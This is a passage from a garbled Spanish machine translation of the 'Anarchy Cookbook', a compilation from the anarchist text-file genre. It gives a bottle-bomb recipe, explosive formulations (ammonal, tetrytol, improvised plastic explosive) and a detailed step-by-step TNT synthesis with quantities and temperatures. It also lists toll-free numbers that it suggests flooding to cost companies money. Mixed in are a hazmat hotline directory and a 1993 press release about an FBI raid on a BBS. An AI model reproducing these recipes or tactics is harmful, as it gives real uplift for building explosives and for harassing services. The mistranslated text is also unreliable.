9. Ahora, basta con tirar del cordón y la puerta, al mismo tiempo, y viola! la puerta está abierta.

Yo prefiero esta más regular de la cerradura-cosecha, si la puerta se abre hacia afuera, porque es mucho más rápido. La recolección de bloqueo puede tomar 5 minutos ... Cuando se hace correctamente esto sólo tarda 30 segundos! Por lo tanto, si es posible, utilice este.

EXPLOSIVOS 179.ANARCHY 'N' - VOLUMEN preludio de Éxodo

Para ustedes que les gusta volar cosas y cosas así, aquí hay algo que no es tan peligroso o tan difícil como varios de los explosivos disponibles (o es capaz de crear) ... Se llama la LN ² Bomb (Bomba corto para nitrógeno líquido). Muy fácil de hacer:

Ingredientes: • Un plástico de dos litros Botella• El nitrógeno líquido suficiente para llenar la botella

Page 257: 106652012 the Anarchy Cookbook 2000 Es

Instrucciones:

Llena la botella con nitrógeno líquido. A continuación, la tapa lo más apretada posible. La vaporización del nitrógeno crear la suficiente presión en la botella (a menos de 5-15 minutos) para romper con una fuerza explosiva muy fuerte ... Muy fácil ...

USAR BAJO SU PROPIO RIESGO ....

800 # 's de phuck con Compilado por El duelista

CONVOCATORIA JYER INC xxx-xxx-xxxxLos números con un? ya sea la llamada a tomar en algún viaje a través de los interruptores, pero estoy seguro que si vete a la mierda un rato con él lo suficiente va a llegar allí el tono en alguna parte.

Que se diviertan ....... Más tarde!

800 -4261244?6456561 VMS2471753?5244040?6348026?6677827?8723425? (Ampliación marcador)9928911? MódemVMS (# 6242367)4262468?3389549 VMS2220400?5376001?VMS (# 3439255)8326979?2339558 VMS7299000?5335545?3332222?3335555 VMS3338888?

=========== Números gratuitos en línea y de BASES DE DATOS ==========

Hay muchos números telefónicos gratuitos de asistencia en línea y de bases de datos disponibles a nivel federal, estatal, local y personal del sector privado. Algunos pueden estar disponibles a través de una agencia federal o estatal, mientras que otros están a disposición del público en los sistemas comerciales oa través de organizaciones privadas. A excepción de su propia, ni el DOT ni FEMA aprueba los siguientes números gratuitos de teléfono o bases de datos on-line.

1. Federales y estatales sin costo desde las fuentes de asistencia técnica2. Línea gratuita del Sector Privado de Asistencia Técnica3. Federal y Bases de Datos de Agencias Estatales en línea4. Bases de datos comerciales en línea y Privado

FEDERALES Y ESTATALES GRATUITOS DE FUENTES DE ASISTENCIA TÉCNICA

Guardia Costera de EE.UU. - Nacional Respuesta Centro: 1-800-424-8802 en Washington,Corriente continua - (202) 426-2675 (202) 267-2675

Page 258: 106652012 the Anarchy Cookbook 2000 Es

Regionales de la EPA LÍNEAS DIRECTAS

La EPA ha establecido una línea telefónica directa en cada una de sus oficinas regionales para manejar el Título III de informes. Por favor, tome nota del número de la oficina en su área.

A nivel nacional - (800) 535-0202

En Alaska y DC - (202) 479-2449

En las Oficinas Regionales:

Región I - Boston,MA - (617) 565-3273Región II - Edison,Nueva Jersey - (201) 321-6765Región III - Filadelfia,Pensilvania - (215) 597-1260Región IV - Atlanta,Georgia - (404) 347-3222V Región - Chicago,Illinois - (312) 886-6418VI Región - Dallas, TX - (214) 655-7244Región VII - Kansas City, KS - (913) 236-2806VIII Región - Denver,CO - (303) 293-1730IX Región - San Francisco,California - (415) 974-7054X Región - Seattle,Washington - (206) 442-1270

Recuerde que debe informar de todos los comunicados de materiales peligrosos a su representante de Comité de Emergencia Local de Planificación y la Comisión Estatal de Respuesta a Emergencias de inmediato!

Inventario de Emisiones Tóxicas CENTRO DE INFORMES

La EPA ha establecido una sala de lectura en el Inventario de Tóxicos Reporting Center (TRC), ubicado a 470 L'Enfant Plaza Oriente, SW, Suite 7103,Washington,Corriente continua 20024. La sala de lectura ofrece un lugar para que los ciudadanos interesados para revisar los datos de liberación según lo provisto a la Agencia de Protección del Medio Ambiente (a través de la sección 313 informes). Hasta la fecha, el centro ha recibido más de 50.000 de los 300.000 informes de libertad anticipada.

El de TRC está destinado a servir como un punto central de la recepción, la ayuda en la grabación de la clasificación y el almacenamiento de los datos de emisiones reportado en el Título III. Además, el TRC es proporcionar un método fácil para facilitar investigaciones públicas. Cualquier persona puede acceder a la información química ingresando a una base de datos y llamar a la información de seguridad mediante CAS nombre de número, estado, ciudad y / o instalación.

El personal de sistemas informáticos, Inc. (contratista de la EPA) está a su disposición para ayudar con las investigaciones del sistema entre 8:00 am y 16:00, De lunes a viernes. Para programar una cita, llame al (202) 488-1501.

EMERGENCIA QUÍMICA DE PREPARACIÓN PARA EL PROGRAMA (CEPP) - 1- (800) 535-0202 (202) 479-2449Contacto: Programa de Preparativos para Emergencias Químicas (CEPP) Oficina de Desechos Sólidos y Preparación para Emergencias EE.UU. Agencia de Protección Ambiental (WH-548A) 401 M Street, SW Washington,Corriente continua 20460

EMERGENCIA GESTIÓN INFORMACIÓN CENTRO (EMIC) - 1-800-638-1821 (301) 447-6771 ext 6032Contacto: Bibliotecario EMIC, Aprendizaje Recurso Centro

Page 259: 106652012 the Anarchy Cookbook 2000 Es

Nacional Emergencia Formación Centro16825 South Seton AvenueEmmitsburg,Maryland 21727

FEMA estableció EMIC (Emergencia Administración Información Centro) Para ayudar a los profesores, personal, estudiantes y usuarios de fuera del campus de la Nacional Emergencia Formación Centro Aprendizaje Recurso Centro con su investigación y las necesidades de información. EMIC es una colección especial de documentos de estudio de casos naturales y tecnológicos que pueden ser solicitados en préstamo a los incendios a nivel estatal y los funcionarios de manejo de emergencias mediante la aplicación por escrito, en papel con membrete oficial, a la bibliotecaria EMIC. Otras solicitudes se remitirán a los estados apropiados para el manejo.

Superfund y de Conservación y Recuperación de ACT - 1-800-424-9346 (202) 382-3000

Contacto: Para Superfund - Oficina de Respuesta de Emergencias y Correctivas Ambiental de los EE.UU. Agencia de Protección 401 M Street, SW Washington,Corriente continua 20460

Para CERCLA - Oficina de Residuos Aplicación de Programas Ambiental de los EE.UU. Agencia de Protección 401 M Street, SW Washington,Corriente continua 20460

La EPA ha establecido la línea gratuita Línea de Asistencia Técnica en 1980 para responder preguntas y proporcionar documentos a los que necesitan información sobre la conservación de Superfund y Recursos, y la Ley de Recuperación.

Control de Sustancias Tóxicas (TSCA) - (202) 554 a 1.404

Contacto: Ley de Control de Sustancias Tóxicas Oficina de Asistencia Oficina de Sustancias Tóxicas Ambiental de los EE.UU. Agencia de Protección

NÚMERO DE TELÉFONO DEL SECTOR PRIVADO GRATUITO DE APOYO DE ASISTENCIA TÉCNICA

CHEMTREC 1- (800) 424-9300. Alaska, Hawai y CC (202) 483-7616Contacto: Asociación de Fabricantes de Productos Químicos 2501 M Street, NW Washington,Corriente continua 20037.

La Chemical Manufacturers Association creó el Centro de Emergencias de Transporte de Productos Químicos (CHEMTREC) para brindar asistencia inmediata a las personas en el lugar del accidente, 24 horas al día, siete días a la semana. CHEMTREC mantiene una base de datos en línea en la industria química, física y las propiedades toxicológicas y efectos sobre la salud de los miles de productos de las empresas miembros. CHEMTREC opera en dos etapas: en primer lugar, el personal proporcionará información sobre sustancias químicas para su uso en la toma de decisiones en el sitio que implica el manejo de las primeras etapas del problema y, en segundo lugar, notifica al fabricante del producto del accidente para obtener información más detallada y un seguimiento adecuado.

CHEMNET se activa mediante una llamada a CHEMTREC. Si un transportista miembro no puede responder con prontitud a un incidente y un experto en química se requiere en un sitio, el remitente puede autorizar a una empresa de emergencia CHEMNET contratado por la respuesta para ir en su lugar.

Page 260: 106652012 the Anarchy Cookbook 2000 Es

CHLOREP: Contacto de emergencia a través CHEMTREC arriba.Contacto: Instituto del Cloro 342 Madison Avenue Nueva York,Nueva York 10017.

El Instituto de cloro en 1972 estableció su Plan de Emergencia de cloro (CHLOREP), una red de respuesta de ayuda mutua de los fabricantes y envasadores de cloro, para prestar asistencia en situaciones de emergencia de cloro en el Estados Unidos y Canadá a través de instrucciones telefónicas a personal en el lugar del siniestro o el envío de equipos capacitados a otros sitios. La respuesta se activa mediante una llamada a CHEMTREC que a su vez llama a la designada CHLOREP contacto, que notifica al jefe de equipo adecuado en función de las asignaciones geográficas CHLOREP sector del equipo.

CAER: Sensibilización de la Comunidad y la línea de Respuesta a Emergencias de la información. Este es un mensaje de dos minutos grabado informar a los llamadores de los próximos eventos relacionados con la planificación coordinada de respuesta a emergencias. El número de información es CAER (202) 463-1599 y se actualiza dos veces al mes.

Para enviar un evento para darse a conocer, enviar los materiales a: Todd Miller CMA Departamento de Comunicaciones 2501 M Street, NW Washington,Corriente continua 20037

El Centro de Investigación de Incendios de la Oficina Nacional de Normalización ha establecido un ordenador de acceso público tablón de anuncios.

Contacto: Doug Walton Operador del Sistema

U (301) 975-6872

La información sobre el tablón de anuncios incluye:

• Un listado de los informes más recientes del Centro de Investigación de Bomberos;• Información sobre las próximas actividades en el Centro de Investigación fuego

tales como conferencias, seminarios y talleres, y• La información sobre FIREDOC, el Centro de investigación de incendios sistema

bibliográfico.

FEDERALES Y ESTATALES DE BASES DE DATOS DE LA AGENCIA EN LÍNEA

La Oficina de Desechos Sólidos y Respuesta de Emergencia (OSWER) tablón de anuncios está destinado a almacenar las comunicaciones y la transferencia de tecnología entre las regiones y con personal de la Sede participa en la regulación de los residuos sólidos o peligrosos, permisos, o la ejecución y con los científicos e ingenieros de ORD en la Sede y los laboratorios que están apoyando OSWER. El OWSER es operado bajo contrato con la Oficina del Programa de Gestión de la Tecnología (OPMT). El BBS OSWER ofrece mensajes, boletines, archivos y programas informáticos, bases de datos, y conferencias. Boletines de incluir oportunidades OSWER técnicas de capacitación y seminarios de transferencia de tecnología a nivel nacional ORD, nueva ORD publicaciones técnicas, los 25 compuestos que se encuentran en los sitios de Superfund, y el estado actual de las manifestaciones sitio de tecnología. Las conferencias incluyen: Ejecutivo (sólo para los administradores de la EPA), la estación de trabajo de aguas subterráneas, las aguas subterráneas Monitoreo y Remediación, Sistemas de Gestión de Riesgo / Evaluación y expertos / Sistemas de Información Geográfica. El BBS está destinado principalmente a regional de la EPA, la Sede, y el personal de DOR, sin embargo, da la bienvenida a OSWER agencias gubernamentales estatales y locales y los

Page 261: 106652012 the Anarchy Cookbook 2000 Es

contratistas autorizados de la EPA. El número de teléfono BBS es (301) 589-8366, la línea de voz es (301) 589 a 8368.

Los Sistemas de Información de Materiales Peligrosos (HMIS) ofrece dos basadas en menús de programas para ayudar a las agencias estatales, locales y federales. El Departamento de Transporte de EE.UU. (DOT), Investigación y Programas Especiales de la Administración (RSPA) proyecto ofrece acceso rápido a la información, tanto las exenciones y las interpretaciones informales. El menú de las exenciones permite acceder a la siguiente: Los números de la exención, los titulares de exención, las fechas de vencimiento, tipo de contenedor y la especificación DOT, materiales peligrosos, nombre de embarque y de clase, y los reglamentos afectados. El menú proporciona acceso a las interpretaciones informales interpretaciones emitidas por la División de Normas de la Oficina de Transporte de Materiales Peligrosos. Cada búsqueda ofrece: solicitante, sin perjuicio, de los productos básicos, contenedores y reglamentos afectados. Este servicio se ofrece gratis a las agencias estatales, locales y federales. Organizaciones del sector privado no puede obtener una cuenta en el HMIS, pero pueden llamar para recibir las impresiones sobre la información que necesitan (hay un cargo para la impresión). Con el fin de tener acceso a los HMIS primero debe establecer una Cuenta poniéndose en contacto con:

Lessie GravesOficina de Transporte de Materiales PeligrososServicios de InformaciónFTS / COMM: (202) 366-4555

Seguridad y Salud Ocupacional de la Administración de Trabajo (OSHA) Sistema de Información Computarizado (OCIS) está diseñado para ayudar Programa de OSHA, Estado de OSHA, y el personal de área de OSHA Oficina para responder a los empleadores y los empleados de los problemas de seguridad y salud ocupacional, manteniendo un acceso rápido a la información computarizada varios archivos. OCIS archivos se mantienen en un VAX Digital 11/750 en el equipo de Salt Lake City Laboratory; base es el software de gestión de base de datos, el sistema se accede desde las oficinas del Programa de OSHA y el Estado solamente, los archivos son a base de menús, y nuevas capacidades se están desarrollando.

Preguntas y comentarios pueden dirigirse a:

OCIS Help Desk(801) 524-5366 o 524-5896FTS 588-5366 o 588-5896

La Biblioteca Nacional de (NLM) Medicina Toxicología de red de datos (TOXNET) es un sistema computarizado de los bancos de datos orientadas al punto de vista toxicológico, que ofrece una búsqueda sofisticada y paquete de recuperación que permita el acceso eficiente a la información sobre los productos químicos conocidos e identifica los productos químicos desconocidos en función de sus características. TOXNET archivos incluyen: datos de sustancias peligrosas del Banco (HSDB), Banco de Datos de Toxicología (TDB), e Información de Investigaciones Químicas Carcinogénesis, Sistema (CCRIS).

Los usuarios registrados pueden acceder a la NLM TOXNET por línea directa oa través de TELENET o redes de telecomunicaciones Tymnet. Los cargos de las naciones promedio de búsqueda (por hora) es de $ 75.00 para el prime time.

Para obtener información detallada sobre los contactos de TOXNET:La Biblioteca Nacional de MedicinaServicios especializados de informaciónBiomédica Archivos Subdirección de Aplicación8600 Rockville PikeBethesda,MD 20894(301) 496-6531 o 496-1131

BASES DE DATOS EN LÍNEA COMERCIAL Y PRIVADO

Page 262: 106652012 the Anarchy Cookbook 2000 Es

FIREDOC: Naciones disponibles de NBSEl Centro de Investigación de Incendios de la Oficina Nacional de Estándares ha hecho su sistema bibliográfico computarizado, FIREDOC, disponibles para la búsqueda en línea. El sistema se puede acceder por teléfono utilizando un equipo como un terminal. Cerca de 7.000 objetos de la colección del Centro están actualmente inscritos en el sistema de FIREDOC. Para más información, incluyendo instrucciones sobre el acceso y uso de FIREDOC, póngase en contacto con:

Nora JasonEspecialista en Información TécnicaCentro de Investigación de Incendios(301) 975-6862

CFRBBS es un ordenador de acceso público tablón de anuncios patrocinado por: el Centro para la Investigación de Incendios de la Oficina Nacional de Normas, EE.UU. Departamento de Comercio, en Gaithersburg,MD 20899. Cuenta con programas de computadora desarrollados por el Centro de Fire Research. El contenido de la tarjeta incluyen: programas de simulación de incendios, información sobre FIREDOC (el Centro de Investigación para el sistema contra incendios búsqueda bibliográfica, guía del usuario FIREDOC; y el paquete de comunicaciones FIREDOC compatibles), información sobre las próximas actividades en el Centro de Investigación de Incendios, y una lista de la año más reciente de los informes del centro. No hay cuota de conexión para el uso de la tarjeta, sin embargo el usuario paga por la llamada telefónica. Para más información comuníquese con Doug Walton, Operador del Sistema, al (301) 975 a 6,872.

Públicas de la Fundación de Salud Pública de la Red de Salud (PHN) los usuarios tienen acceso total a todos los médicos GTE información de red (MINET) los servicios, y puede comunicarse directamente con los usuarios de la NPH y de otras divisiones de MINET. El acceso a la Cirujano General, NLM / NIH, los CDC y la American Medical Association servicios de información (por ejemplo, Información de la enfermedad, Información de Medicamentos, la codificación de procedimientos médicos, Bibliografía socioeconómica, perito médico de Recuperación de Información Médico y el Servicio de Educación, Hospital General de Massachusetts (MGH) Médica Continua Educación y Servicio Médico de AP Noticias) están disponibles cuyos precios oscilan entre $ 21 a $ 39 una hora de tiempo de conexión.

Cuota de suscripción, pagadero en una sola vez es de $ 500.00, cada usuario adicional se registra en 25,00 dólares, y una Guía del usuario cuesta $ 15.00. Tiempo de conexión tarifas van desde $ 14 la hora pico a $ 7 la hora no pico, los cargos de transmisión son de carácter $ 0,05 por cada 1.000 caracteres.

Para obtener información detallada sobre los contactos de la NPH o MINET:La Fundación de Salud Pública1220 L Street, NWSuite 350Washington,Corriente continua 20005(202) 898-5600

Consultores de Información, Inc. 's Sistema de Información de Productos Químicos (SICI) y el Sistema de Información Química, Inc.' s (Fein Asociados Marquart) System (CIS) son dos empresas competidoras que ofrecen aproximadamente 35 bases de datos de cada uno, algunos otros similares, diferentes. Bases de datos disponibles para la búsqueda de incluir, por ejemplo: Petróleo y Materiales Peligrosos de Asistencia Técnica Data System (OHMTADS) con énfasis en los datos ambientales y de seguridad para la respuesta a los derrames, la búsqueda y recuperación de Evaluación de Productos Químicos (Ceasars) da muy detallada, los perfiles evaluados con física y química, información toxicológica y medio ambiente; Registro NIOSH de Efectos Tóxicos de Sustancias Químicas (RTECS) con aguda toxdata, TLV, normas, acuática información tox, de reglamentación, y el estado de NTP de ensayo; cancerigenos de Investigaciones Químicas del Sistema de Información (CCRIS), dando resultados de efectos carcinogénicos, mutagénicos, la promoción de tumores y de las pruebas de carcinogenicidad en virtud del contrato Instituto Nacional del Cáncer; GENETOX con los estudios de análisis genéticos; AQUIRE con información toxicidad acuática; dérmico con la información sobre la toxicidad dérmica.

Page 263: 106652012 the Anarchy Cookbook 2000 Es

Suscriptor ($ 300 por año y $ 25-85 por hora de tiempo de conexión) y no suscriptores ($ 50-115 por hora, el tiempo de conexión) las opciones que existen.

Para mayor información contactar detallada: CIS, Inc. o de Consultores de Información, Inc. Fein Marquart Asociados 1133 15th St., NW 7215 York Road Washington,Corriente continua 20005 Baltimore,MD 21212 (202) 822-5200 (800) 247-8737

180. EXPLOSIVOS anarquía 'N' - Volume 1 de Éxodo

Usted se preguntará: "¿Ahora por qué iba yo a querer conocer algunos obsoletos, sin usar, completamente inútiles, números de teléfono gratuitos" Bueno, lo que se utiliza esta información para depende de ti, y si quieres usarlo para algo como ... así, como, obligando a que la línea para ser ocupada por 2 días consecutivos por lo tanto causantes de la compañía a perder dinero, es totalmente suya.

Revistas= - = - = - = - =Playgirl Asesor (800) 854-2878 (excepto CA)TV Guide (800) 523-7933 (con excepción de PA)Lenceria Home Journal (800) 327-8351 (con excepción de FA)Sports Illustrated (800) 621-8200 (excepto IL)Libro Digest (800) 228-9700 (con excepción de Nebraska)El dinero (800) 621-8200 (excepto IL)Del pedido por correo= - = - = - = - = -(Bolos equipo.) (800) 323-1812 (excepto IL)Edd la floristería, Inc. (800) 247-1075 (con excepción de IA)Golf del pedido por correo Co. (800) 327-1760 (con excepción de FA)Inflar-a-cama (800) 835-2246 (excepto en KS)Internacional Mujer (800) 854-2795 (excepto CA)Porta Yoga (órdenes cc) (800) 327 a 8912 (excepto FA)Único Products Co. (800) 228-2049 (con excepción de Nebraska)Estaciones de esquí= - = - = - = - = - =HN Concordia (800) 431-2217 (sólo en los Estados de Nueva Inglaterra)Monte Nieve (800) 451-4211 (Eas orrn Seabord)Nosotros en el equipo de esquí Franconia (800) 258-0366 (Este Seabord)Stevensville (800) 431-2211 (estados de Nueva Inglaterra)Maniquíes= - = - = - = - = -Dann-Dee (800) 621-3904 (excepto IL)Alquiler de Coches= - = - = - = - = - =A-Aaron, Inc. (800) 327-7513 (con excepción de FA)Aerolíneas Rent-A/Car (800) 228-9650 (sólo FA)De un dólar al día (800) 421-6868 (con excepción de FA)Hertz (800) 261-1311 (Canadá solamente)Sears Rent-A-Car (800) 228-2800 (con excepción de Nebraska)Thrifty Rent-A-Car (800) 331-4200 (con excepción de Oklahoma)Periódicos= - = - = - = - = -Globo Gaceta (800) 392-6622 (IA única)Oil Daily (800) 223-6635 (con excepción de Nueva York)La Ciencia Cristiana Motor (800) 225-7090 (con excepción de MS)Wall Street Journal (800) 257-0300 (con excepción de Nueva Jersey)El Observador Nacional (800) 325-5990 (excepto MO)

Page 264: 106652012 the Anarchy Cookbook 2000 Es

El FBI ataca a los principales Ohio ordenador de a bordo de anuncios, la acción sigue a la investigación conjunta con la SPA.

La Federación de Agencias de Investigación sobre Sábado, 30 de enero 1993, Asaltaron "Rusty y de Edie," un tablón de anuncios situado en equipo Boardman,Ohio, Que ha sido presuntamente distribuir ilegalmente programas de software con derechos de autor. Incautados en la operación en el culo y tabla de Edie boletín de computadoras eran, discos duros y equipos de telecomunicaciones, así como los registros financieros y el suscriptor. Para los últimos meses, el Software Publishers Association ("SPA") ha estado trabajando con el FBI en la investigación de Rusty y tabla de Edie boletín, y como parte de esa investigación se ha descargado numerosos derechos de autor los programas de negocios y de entretenimiento de la junta.

La investigación se inició a raíz SPA de la recepción de las quejas de un número de miembros de la SPA que su software estaba siendo distribuidos ilegalmente en el culo y BBS de Edie. El tablón de anuncios de Rusty y Edie fue una de las filmaciones de anuncios privados en el país. Tenía 124 nodos disponibles a los que llaman y más de 14.000 suscriptores en todo el Estados Unidos y varios países extranjeros. Hasta la fecha, la Junta ha registrado más de 3,4 millones de llamadas telefónicas, las llamadas nuevas llegando a una tasa de más de 4.000 por día. Fue establecido en 1987 y había ampliado para incluir más de 19 gigabytes de almacenamiento de la vivienda más de 100.000 archivos disponibles para los suscriptores para descargar. Se había pagado los abonados en todo el Estados Unidos y varios países extranjeros, entre ellos Canadá,Luxemburgo,Francia,Alemania,Finlandia, El Países Bajos,España,Suecia y el Reino Unido.

Un tablón de anuncios de ordenador permite a los usuarios de computadoras personales para acceder a un ordenador central mediante un teléfono equipado con módem para el intercambio de información, incluyendo mensajes, archivos y programas informáticos. El operador de sistemas es generalmente responsable de la operación del tablón de anuncios y determina quién tiene permiso para acceder al tablón de anuncios y en qué condiciones. Por una cuota de $ 89.00 por año, los suscriptores a la Rusty y tabla de Edie boletín se les dio acceso a los contenidos de la junta, incluyendo muchas empresas con derechos de autor popular y paquetes de entretenimiento. Los suscriptores pueden "descargar" o recibir estos archivos para su uso en sus propios ordenadores sin tener que pagarle nada al dueño con derechos de autor para ellos.

"El SPA aplaude la acción del FBI hoy", dijo Ilene Rosenthal, asesor general de la SPA. "Esto demuestra que el FBI reconoce el daño que el robo de la propiedad intelectual hace que una de las industrias USÆs más vibrantes. Lo que demuestra claramente una tendencia a que el gobierno entiende la gravedad de la piratería de software." El SPA está trabajando activamente con el FBI en la investigación de los tablones de anuncios de ordenador, y las incursiones similares en otras juntas se espera en breve. Ya sea que se copian de un programa comprado en una tienda de informática barrio o descargado desde unos cuantos miles de BBS de kilómetros de distancia, software pirata aumenta el costo de la computación. De acuerdo con la SPA, en 1991, la industria del software perdió US $ 1,2 mil millones en los EE.UU. solamente. Las pérdidas a nivel internacional son varios miles de millones de dólares más.

"Mucha gente puede no darse cuenta de que los piratas de software que los precios más altos, en parte, a compensar las pérdidas derivadas de la piratería editorial", dice Ken Wasch, director ejecutivo de la SPA. Además, arruinar la reputación de los cientos de tablones de anuncios legítimos que sirven una función importante para los usuarios de computadoras. "El Software Publishers Association es la principal asociación comercial de la industria de software de ordenador personal. Es más de 1.000 miembros representan a las principales editoriales en el los mercados de negocios, la educación de los consumidores y de software. El SPA cuenta con oficinas en Washington DC, y en París, Francia.

CONTACTO: Software Publishers Association, Washington Ilene Rosenthal .. 202/452-1600 ext. 318 Terri Niños ..... 202/452-1600 ext. 320

Page 265: 106652012 the Anarchy Cookbook 2000 Es

181.ANARCHY 'N' EXPLOSIVOS - Volumen 2 por Exodus

Este volumen define unas pocas variedades de misceláneos. explosivos, cargas y todo lo que yo tenía en mente en ese momento. De todos modos, estas fórmulas no son tan precisos en las mediciones para que se les dio en el breve resumen. Sin embargo, van a trabajar, y si se usan correctamente pueden ser seguros y "diversión".

FRANCÉS amonal [Bajo explosivo]:

Ingredientes:

• 86% de Nitrato de Amonio• 6% de ácido esteárico• 8% de aluminio en polvo

Descripción:

Francés amonal es una facilidad improvisada mezcla explosiva de baja. En general, es menos eficaz que un peso igual de TNT. El material es cargado por prensado en un recipiente adecuado. Iniciación por la tapa especial de voladura de un Ingeniero se recomienda.

Comentarios:

Este material se probó. Es eficaz.

Referencias:

TM 31-201-1, dispositivos y técnicas de guerra no convencional, párrafo 1401.

TETRYTOL [High Explosive]:

Ingredientes:

• 75% Tetrytol• 25% de TNT

Descripción:

Tetrytol es una alta carga explosiva explosión. Se utiliza como un explosivo de demolición, una carga explosiva de las minas, y en proyectiles de artillería. La fuerza explosiva de tetrytol es aproximadamente la misma que la de TNT. Puede ser iniciado por un detonador. Tetrytol está normalmente cargado por colada.

Comentarios:

Este material se probó. Es eficaz.

Referencias:

TM 9-1900, Municiones, General, página 55. Explosivos militares, 188 páginas.

IMPROVISACIÓN DE RELLENO explosivo plástico [de alto explosivo]:

Ingredientes:

• El clorato de potasio finamente pulverizado • Cdata bstals• Jalea de petróleo• MIX ** Thouroughly **

Page 266: 106652012 the Anarchy Cookbook 2000 Es

Descripción:

Este relleno explosivo plástico pueden ser detonados con un N º 8 detonador comercial o con cualquier detonador militar. El explosivo debe ser almacenado en un recipiente impermeable hasta que esté listo para usar.

Comentarios:

Este material se probó. Es eficaz.

Referencias:

TM 31-210, Municiones improvisados, sección I, N º 1.

INFLAMABILIDAD DE GASES [gas explosivo]:

Ingredientes:

• El gas explosivo

Descripción:

Bajo ciertas condiciones, los gases comunes actuar como combustible. Cuando se mezcla con el aire, que se quemará rápidamente o explotar. Para algunas mezclas de aire-combustible, el rango sobre el cual la explosión puede ocurrir es bastante amplio, mientras que para otros son los límites estrechos. Las cantidades superiores e inferiores de los combustibles comunes que causan una mezcla inflamable se muestran en la tabla siguiente. La cantidad que se muestra es el porcentaje en volumen de aire. Si la mezcla aire-combustible es demasiado pobre o demasiado rica, no se encenderá. Las cantidades que se muestran por ello son llamados límites de inflamabilidad.

Gases (% en volumen de aire)De combustible (gas) Límite inferior Límite superiorEl agua de gas o azul 7.0 72Gas Natural 4.7 15Hidrógeno 4.0 75Acetileno 2 ½ 81Propano 2.2 10Butano 1.9 9

Comentarios:

Estos combustibles se han probado en condiciones de laboratorio. Son eficaces. Encendido depende del método de iniciación, la uniformidad de la mezcla, y las condiciones físicas.

Referencias:

Boletín 29, los límites de inflamabilidad de gases y vapores Coward HF y GW Jones, la Dirección de Minas, Gobierno de los EE.UU. Oficina de Imprenta de 1939.

182.ANARCHY 'N' EXPLOSIVOS - Volumen 3 por Exodus

Este es el más importante o uno de los volúmenes más importantes con respecto a las diversas mezclas de la anarquía que voy a ser la "publicación" para el "público". También, puede ser también el más peligroso para preparar, la sustancia que se trata es de trinitrotolueno, o corto - TNT. Este explosivo es muy peligroso, sustancia ligeramente inestable. El crudo cristalizado TNT es por el color de azúcar morena y se siente suave al tacto. Es conveniente para muchos usos como un alto explosivo, pero no para el uso en alto explosivo conchas. También es altamente reactivo con muchas otras

Page 267: 106652012 the Anarchy Cookbook 2000 Es

sustancias químicas. Se puede incorporar en dinamita y muchos otros explosivos que se explicarán con más detalle más adelante, en otros volúmenes de ANARQUÍA.

ADVERTENCIA:NO INTENTE Para terminar este proyecto a menos que sean totalmente capaces SEGURIDAD DE EJECUCIÓN DE LOS PROCESOS EN UN ENTORNO SEGURO! SI USTED DECIDE CONTINUAR, LEA LAS INSTRUCCIONES ANTES DE COMENZAR completamente a través de Y TIENE TODOS LOS MATERIALES Y HERRAMIENTAS (incluida la seguridad / EQUIPO DE EMERGENCIA) LISTO PARA SU USO cuándo o si se necesitan. ESTO NO ES UNA BROMA! USAR BAJO SU PROPIO RIESGO!!

Preparación de trinitrotolueno (tres etapas). Una mezcla de 294 gramos de ácido sulfúrico concentrado (densidad 1,84) y 147 gramos de ácido nítrico (densidad 1,42) se añade lentamente desde un embudo de goteo a 100 gramos de tolueno en un alto 600-cc. vaso de precipitados, mientras que el líquido se agita vigorosamente con un agitador eléctrico y su temperatura se mantiene a 30 ° C a 40 ° C mediante un chorro de agua fría en el recipiente en el que el vaso está de pie. La adición de ácido se necesita entre una hora a una hora y media. La agitación se continuó durante media hora más, sin enfriamiento, la mezcla se deja reposar durante la noche en un embudo de separación, la capa inferior de ácido gastado se extrae, y el crudo mononitrotolueno se pesa. La mitad de la misma, correspondiente a 50 gramos de tolueno, se da por la dinitration. El mononitrotolueno (MNT) se disuelve en 109 gramos de ácido sulfúrico concentrado (m. 1,84) mientras que la mezcla se enfría en agua corriente. La solución en un vaso de precipitados de altura se calienta a 50 ° y un ácido mixto, compuesto por 54 ½ gramos cada una de ácido nítrico (m. 1 ½ 0) y ácido sulfúrico (m. 1,84), se añade lentamente gota a gota desde un embudo de goteo mientras que el mezcla se agitó mecánicamente. El calor generado por la reacción eleva la temperatura, y la velocidad de adición del ácido está regulado de modo que la temperatura de la mezcla se encuentra siempre entre 90 ° y 100 °. La adición del ácido requerirá aproximadamente 1 hora. Después de que el ácido se ha añadido, la mezcla se agita durante 2 horas más, a 90 ° -100 ° para completar la nitración. Dos capas separadas en reposo. La capa superior se compone principalmente de dinitrotolueno (DNT), pero probablemente contiene una cierta cantidad de TNT. El trinitration en el laboratorio se lleva a cabo convenientemente sin separar la DNT a partir del ácido gastado.

Mientras que la mezcla se agita dinitration activamente a una temperatura de aproximadamente 90 °, 145 gramos de ácido sulfúrico fumante (petróleo que contiene 15% libre de SO 3) se añade lentamente vertiendo desde un vaso de precipitados. Un ácido mixto, compuesto de 72 gramos cada una media de ácido nítrico (m. 1 ½ 0) y el petróleo 15%, ahora se añade gota a gota con una buena agitación mientras que el calor de la reacción mantiene la temperatura a 100-115 °. Después de aproximadamente tres cuartas partes del ácido se ha añadido, se encontró necesario aplicar calor externo para mantener la temperatura. Después de todo el ácido se ha agregado (tomando de 1 ½ a 2 horas), la calefacción y la agitación se continuó durante 2 horas más, a 100-115 °. Después el material se ha detenido durante la noche, la capa superior de TNT se encontró que se han solidificado a una torta dura, y la capa inferior de ácido gastado para ser llenado con bstals cdata. El ácido se filtró a través de un embudo Buchner (sin filtro de papel), y la torta se divide y se lavó con agua sobre el mismo filtro para eliminar el exceso de ácido. El ácido usado contiene cantidades considerables de TNT en solución, lo que se precipita por verter el ácido en un gran volumen de agua, se filtró, se lavó con agua, y se añadió a la mezcla principal. Toda la del producto se lava tres o cuatro veces por agitar vigorosamente con agua caliente en las que se funde. Después del último lavado, el TNT se granula, permitiendo que se enfríe lentamente bajo el agua caliente mientras se continúa la agitación. El producto, se filtró y se secó a temperatura ambiente ordinario, es igual a una buena muestra comercial de crudo de TNT. Puede ser purificado por disolución en alcohol caliente a 60 ° y permitiendo que se enfríe lentamente, o puede ser purificado por digestión con 5 veces su peso de hidrógeno sulfito de sodio al 5% solución a 90 ° durante media hora con agitación vigorosa, lavando con agua caliente hasta que los lavados son incoloros, y granulación, finalmente, como antes. El producto de este último tratamiento es igual a una buena muestra comercial de TNT purificado. Pura ALPHA-TNT, punto de fusión 80,8 °, podrán ser adquiridos por recristalización de este material una vez de ácido nítrico (m. 1,42) y una vez del alcohol.

Page 268: 106652012 the Anarchy Cookbook 2000 Es

Bueno, eso es todo ... Y recordar mi ADVERTENCIA!

